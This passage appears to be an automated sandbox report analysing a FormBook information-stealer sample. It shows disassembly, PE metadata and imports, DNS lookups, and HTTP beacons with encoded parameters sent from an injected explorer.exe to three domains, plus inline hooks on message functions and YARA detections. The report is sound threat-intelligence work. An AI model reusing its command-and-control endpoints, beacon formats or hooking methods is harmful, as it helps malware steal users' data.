                          lea eax, dword ptr [ebp-00000140h]
                          push eax
                          mov dword ptr [ebp-0000012Ch], ebx
                          mov dword ptr [ebp-2Ch], ebx
                          mov dword ptr [ebp-28h], ebx
                          mov dword ptr [ebp-00000140h], 0000011Ch
                          call esi
                          test eax, eax
                          jne 00007FD135241FFAh
                          lea eax, dword ptr [ebp-00000140h]
                          mov dword ptr [ebp-00000140h], 00000114h
                          push eax
                          call esi
                          mov ax, word ptr [ebp-0000012Ch]
                          mov ecx, dword ptr [ebp-00000112h]
                          sub ax, 00000053h
                          add ecx, FFFFFFD0h
                          neg ax
                          sbb eax, eax
                          mov byte ptr [ebp-26h], 00000004h
                          not eax
                          and eax, ecx
                          mov word ptr [ebp-2Ch], ax
                          cmp dword ptr [ebp-0000013Ch], 0Ah
                          jnc 00007FD135241FCAh
                          and word ptr [ebp-00000132h], 0000h
                          mov eax, dword ptr [ebp-00000134h]
                          movzx ecx, byte ptr [ebp-00000138h]
                          mov dword ptr [0042A318h], eax
                          xor eax, eax
                          mov ah, byte ptr [ebp-0000013Ch]
                          movzx eax, ax
                          or eax, ecx
                          xor ecx, ecx
                          mov ch, byte ptr [ebp-2Ch]
                          movzx ecx, cx
                          shl eax, 10h
                          or eax, ecx

                          Rich Headers

                          Programming Language:
                          • [EXP] VC++ 6.0 SP5 build 8804

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000xd28.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x66760x6800False0.6568134014423077data6.4174599871908855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rdata0x80000x139a0x1400False0.4498046875data5.141066817170598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0xa0000x203780x600False0.509765625data4.110582127654237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc0x3b0000xd280xe00False0.3618861607142857data4.101309070607735IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountry
                          RT_ICON0x3b1d80x330Device independent bitmap graphic, 48 x 96 x 1, image size 384, 2 important colorsEnglishUnited States
                          RT_DIALOG0x3b5080x100dataEnglishUnited States
                          RT_DIALOG0x3b6080x11cdataEnglishUnited States
                          RT_DIALOG0x3b7280x60dataEnglishUnited States
                          RT_GROUP_ICON0x3b7880x14dataEnglishUnited States
                          RT_VERSION0x3b7a00x248dataEnglishUnited States
                          RT_MANIFEST0x3b9e80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

                          Imports

                          DLLImport
                          ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                          SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                          ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                          COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                          USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                          GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                          KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                          Possible Origin

                          Language of compilation systemCountry where language is spokenMap
                          EnglishUnited States

                          Network Behavior

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Mar 14, 2023 07:26:26.452915907 CET4969280192.168.2.5170.33.13.246
                          Mar 14, 2023 07:26:26.488609076 CET8049692170.33.13.246192.168.2.5
                          Mar 14, 2023 07:26:26.488878965 CET4969280192.168.2.5170.33.13.246
                          Mar 14, 2023 07:26:26.489401102 CET4969280192.168.2.5170.33.13.246
                          Mar 14, 2023 07:26:26.753766060 CET4969280192.168.2.5170.33.13.246
                          Mar 14, 2023 07:26:26.930221081 CET8049692170.33.13.246192.168.2.5
                          Mar 14, 2023 07:26:26.931668043 CET8049692170.33.13.246192.168.2.5
                          Mar 14, 2023 07:26:26.931935072 CET4969280192.168.2.5170.33.13.246
                          Mar 14, 2023 07:26:26.935959101 CET8049692170.33.13.246192.168.2.5
                          Mar 14, 2023 07:26:26.936068058 CET4969280192.168.2.5170.33.13.246
                          Mar 14, 2023 07:26:26.992990017 CET8049692170.33.13.246192.168.2.5
                          Mar 14, 2023 07:26:27.170537949 CET8049692170.33.13.246192.168.2.5
                          Mar 14, 2023 07:26:47.519939899 CET4969380192.168.2.52.57.90.16
                          Mar 14, 2023 07:26:47.558041096 CET80496932.57.90.16192.168.2.5
                          Mar 14, 2023 07:26:47.558259010 CET4969380192.168.2.52.57.90.16
                          Mar 14, 2023 07:26:47.573074102 CET4969380192.168.2.52.57.90.16
                          Mar 14, 2023 07:26:47.610781908 CET80496932.57.90.16192.168.2.5
                          Mar 14, 2023 07:26:47.610924959 CET80496932.57.90.16192.168.2.5
                          Mar 14, 2023 07:26:47.610956907 CET80496932.57.90.16192.168.2.5
                          Mar 14, 2023 07:26:47.611148119 CET4969380192.168.2.52.57.90.16
                          Mar 14, 2023 07:26:47.630306959 CET4969380192.168.2.52.57.90.16
                          Mar 14, 2023 07:26:47.667232037 CET80496932.57.90.16192.168.2.5
                          Mar 14, 2023 07:27:08.411741018 CET4969480192.168.2.566.113.136.229
                          Mar 14, 2023 07:27:08.554312944 CET804969466.113.136.229192.168.2.5
                          Mar 14, 2023 07:27:08.555350065 CET4969480192.168.2.566.113.136.229
                          Mar 14, 2023 07:27:08.555535078 CET4969480192.168.2.566.113.136.229
                          Mar 14, 2023 07:27:08.698892117 CET804969466.113.136.229192.168.2.5
                          Mar 14, 2023 07:27:09.016885996 CET804969466.113.136.229192.168.2.5
                          Mar 14, 2023 07:27:09.017154932 CET804969466.113.136.229192.168.2.5
                          Mar 14, 2023 07:27:09.017174006 CET804969466.113.136.229192.168.2.5
                          Mar 14, 2023 07:27:09.017183065 CET4969480192.168.2.566.113.136.229
                          Mar 14, 2023 07:27:09.017277956 CET4969480192.168.2.566.113.136.229
                          Mar 14, 2023 07:27:09.017292023 CET4969480192.168.2.566.113.136.229
                          Mar 14, 2023 07:27:09.159578085 CET804969466.113.136.229192.168.2.5
                          Mar 14, 2023 07:27:09.161482096 CET4969480192.168.2.566.113.136.229

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Mar 14, 2023 07:26:25.184062004 CET5695353192.168.2.58.8.8.8
                          Mar 14, 2023 07:26:26.175966978 CET5695353192.168.2.58.8.8.8
                          Mar 14, 2023 07:26:26.445321083 CET53569538.8.8.8192.168.2.5
                          Mar 14, 2023 07:26:26.462286949 CET53569538.8.8.8192.168.2.5
                          Mar 14, 2023 07:26:47.485537052 CET5928753192.168.2.58.8.8.8
                          Mar 14, 2023 07:26:47.518074036 CET53592878.8.8.8192.168.2.5
                          Mar 14, 2023 07:27:08.241353035 CET5864853192.168.2.58.8.8.8
                          Mar 14, 2023 07:27:08.387466908 CET53586488.8.8.8192.168.2.5

                          ICMP Packets

                          TimestampSource IPDest IPChecksumCodeType
                          Mar 14, 2023 07:26:26.462428093 CET192.168.2.58.8.8.8d024(Port unreachable)Destination Unreachable

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Mar 14, 2023 07:26:25.184062004 CET192.168.2.58.8.8.80x3fa3Standard query (0)www.swegon.techA (IP address)IN (0x0001)false
                          Mar 14, 2023 07:26:26.175966978 CET192.168.2.58.8.8.80x3fa3Standard query (0)www.swegon.techA (IP address)IN (0x0001)false
                          Mar 14, 2023 07:26:47.485537052 CET192.168.2.58.8.8.80x7868Standard query (0)www.linnus.shopA (IP address)IN (0x0001)false
                          Mar 14, 2023 07:27:08.241353035 CET192.168.2.58.8.8.80xafd7Standard query (0)www.incentiveexcellence.comA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Mar 14, 2023 07:26:26.445321083 CET8.8.8.8192.168.2.50x3fa3No error (0)www.swegon.techoverdue.aliyun.comCNAME (Canonical name)IN (0x0001)false
                          Mar 14, 2023 07:26:26.445321083 CET8.8.8.8192.168.2.50x3fa3No error (0)overdue.aliyun.com170.33.13.246A (IP address)IN (0x0001)false
                          Mar 14, 2023 07:26:26.462286949 CET8.8.8.8192.168.2.50x3fa3No error (0)www.swegon.techoverdue.aliyun.comCNAME (Canonical name)IN (0x0001)false
                          Mar 14, 2023 07:26:26.462286949 CET8.8.8.8192.168.2.50x3fa3No error (0)overdue.aliyun.com170.33.13.246A (IP address)IN (0x0001)false
                          Mar 14, 2023 07:26:47.518074036 CET8.8.8.8192.168.2.50x7868No error (0)www.linnus.shoplinnus.shopCNAME (Canonical name)IN (0x0001)false
                          Mar 14, 2023 07:26:47.518074036 CET8.8.8.8192.168.2.50x7868No error (0)linnus.shop2.57.90.16A (IP address)IN (0x0001)false
                          Mar 14, 2023 07:27:08.387466908 CET8.8.8.8192.168.2.50xafd7No error (0)www.incentiveexcellence.com66.113.136.229A (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • www.swegon.tech
                          • www.linnus.shop
                          • www.incentiveexcellence.com

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.549692170.33.13.24680C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Mar 14, 2023 07:26:26.489401102 CET18OUTGET /nes8/?wP=KB3xslvhyf-4Q2Gp&5jDX=vrTXUzS5PKOapuU/J9WZ9j9UW2tlnl/e2NjFHhKzi+alY2A+qbqQAB9s++tQbSe7/Ij6 HTTP/1.1
                          Host: www.swegon.tech
                          Connection: close
                          Data Raw: 00 00 00 00 00 00 00
                          Data Ascii:
                          Mar 14, 2023 07:26:26.753766060 CET18OUTGET /nes8/?wP=KB3xslvhyf-4Q2Gp&5jDX=vrTXUzS5PKOapuU/J9WZ9j9UW2tlnl/e2NjFHhKzi+alY2A+qbqQAB9s++tQbSe7/Ij6 HTTP/1.1
                          Host: www.swegon.tech
                          Connection: close
                          Data Raw: 00 00 00 00 00 00 00
                          Data Ascii:
                          Mar 14, 2023 07:26:26.931668043 CET19INHTTP/1.1 403 Forbidden
                          Date: Tue, 14 Mar 2023 06:26:26 GMT
                          Content-Type: text/html
                          Content-Length: 677
                          Connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 73 77 65 67 6f 6e 2e 74 65 63 68 2f 6e 65 73 38 2f 3f 77 50 3d 4b 42 33 78 73 6c 76 68 79 66 2d 34 51 32 47 70 26 61 6d 70 3b 35 6a 44 58 3d 76 72 54 58 55 7a 53 35 50 4b 4f 61 70 75 55 2f 4a 39 57 5a 39 6a 39 55 57 32 74 6c 6e 6c 2f 65 32 4e 6a 46 48 68 4b 7a 69 2b 61 6c 59 32 41 2b 71 62 71 51 41 42 39 73 2b 2b 74 51 62 53 65 37 2f 49 6a 36 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 69 7a 6a 36 63 37 72 6d 6c 30 33 31 78 66 31 37 6d 30 6c 6e 6c 69 7a 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 44 61 74 65 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 32 30 32 33 2f 30 33 2f 31 34 20 31 34 3a 32 36 3a 32 36 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 2f 74 61 62 6c 65 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 32 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://www.swegon.tech/nes8/?wP=KB3xslvhyf-4Q2Gp&amp;5jDX=vrTXUzS5PKOapuU/J9WZ9j9UW2tlnl/e2NjFHhKzi+alY2A+qbqQAB9s++tQbSe7/Ij6</td></tr><tr><td>Server:</td><td>izj6c7rml031xf17m0lnliz</td></tr><tr><td>Date:</td><td>2023/03/14 14:26:26</td></tr></table><hr/>Powered by Tengine/2.3.2<hr><center>tengine</center></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          1192.168.2.5496932.57.90.1680C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Mar 14, 2023 07:26:47.573074102 CET20OUTGET /nes8/?5jDX=+Cx+hhlra2ZnBXtbtOqG2CKZ6fBbmHz3v/4koY00IQGXr6Dpm6w3htg1kyr9LcS3Cwl2&wP=KB3xslvhyf-4Q2Gp HTTP/1.1
                          Host: www.linnus.shop
                          Connection: close
                          Data Raw: 00 00 00 00 00 00 00
                          Data Ascii:
                          Mar 14, 2023 07:26:47.610924959 CET20INHTTP/1.1 404 Not Found
                          Server: nginx
                          Date: Tue, 14 Mar 2023 06:26:47 GMT
                          Content-Type: text/html
                          Content-Length: 146
                          Connection: close
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          2192.168.2.54969466.113.136.22980C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Mar 14, 2023 07:27:08.555535078 CET22OUTGET /nes8/?wP=KB3xslvhyf-4Q2Gp&5jDX=VJV0NBieu5xy/+V3NiTJfFE8YIFhNCyGpCPWTH7L7kDRU9vDU50p89IeJ9KbRODmgBA3 HTTP/1.1
                          Host: www.incentiveexcellence.com
                          Connection: close
                          Data Raw: 00 00 00 00 00 00 00
                          Data Ascii:
                          Mar 14, 2023 07:27:09.016885996 CET22INHTTP/1.1 404 Not Found
                          Date: Tue, 14 Mar 2023 12:03:40 GMT
                          Server: Apache/1.3.19 (Unix) FrontPage/5.0.2.2510
                          Connection: close
                          Transfer-Encoding: chunked
                          Content-Type: text/html
                          Data Raw: 31 34 38 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 2d 20 69 6e 63 65 6e 74 69 76 65 65 78 63 65 6c 6c 65 6e 63 65 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 66 72 61 6d 65 73 65 74 20 72 6f 77 73 3d 22 33 35 2c 2a 22 3e 0a 3c 66 72 61 6d 65 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 72 65 64 69 72 65 63 74 2e 61 61 61 71 2e 63 6f 6d 2f 68 65 61 64 65 72 2e 68 74 6d 6c 22 3e 0a 3c 66 72 61 6d 65 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 61 75 74 6f 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 72 65 64 69 72 65 63 74 2e 61 61 61 71 2e 63 6f 6d 2f 6c 6f 63 61 74 69 6f 6e 2e 63 67 69 3f 64 6e 3d 69 6e 63 65 6e 74 69 76 65 65 78 63 65 6c 6c 65 6e 63 65 2e 63 6f 6d 22 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0a 0a 0d 0a
                          Data Ascii: 148<html><head><title>This domain is registered - incentiveexcellence.com</title></head><frameset rows="35,*"><frame scrolling="no" frameborder="0" src="http://redirect.aaaq.com/header.html"><frame scrolling="auto" frameborder="0" src="http://redirect.aaaq.com/location.cgi?dn=incentiveexcellence.com"></frameset></html>
                          Mar 14, 2023 07:27:09.017154932 CET22INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Chrome Debug Log

                          Code Manipulations

                          User Modules

                          Hook Summary

                          Function NameHook TypeActive in Processes
                          PeekMessageAINLINEexplorer.exe
                          PeekMessageWINLINEexplorer.exe
                          GetMessageWINLINEexplorer.exe
                          GetMessageAINLINEexplorer.exe

                          Processes

                          Process: explorer.exe, Module: user32.dll
                          Function NameHook TypeNew Data
                          PeekMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE7
                          PeekMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE7
                          GetMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE7
                          GetMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE7

                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:07:25:14
                          Start date:14/03/2023
                          Path:C:\Users\user\Desktop\YSpCB8DEek.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\Desktop\YSpCB8DEek.exe
                          Imagebase:0x400000
                          File size:271045 bytes
                          MD5 hash:D927DE8CECB8523B956D2BB2098D20EF
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low

                          General

                          Target ID:1
                          Start time:07:25:14
                          Start date:14/03/2023
                          Path:C:\Users\user\AppData\Local\Temp\afhjjq.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq
                          Imagebase:0x1320000
                          File size:61440 bytes
                          MD5 hash:6C148CA1A207DD5BE97C1726A9F4BABF
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 30%, ReversingLabs
                          Reputation:low

                          General

                          Target ID:2
                          Start time:07:25:15
                          Start date:14/03/2023
                          Path:C:\Users\user\AppData\Local\Temp\afhjjq.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\afhjjq.exe
                          Imagebase:0x1320000
                          File size:61440 bytes
                          MD5 hash:6C148CA1A207DD5BE97C1726A9F4BABF
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:low

                          General

                          Target ID:3
                          Start time:07:25:21
                          Start date:14/03/2023
                          Path:C:\Windows\explorer.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Explorer.EXE
                          Imagebase:0x7ff69bc80000
                          File size:3933184 bytes
                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:4
                          Start time:07:25:35
                          Start date:14/03/2023
                          Path:C:\Windows\SysWOW64\control.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\control.exe
                          Imagebase:0xb80000
                          File size:114688 bytes
                          MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
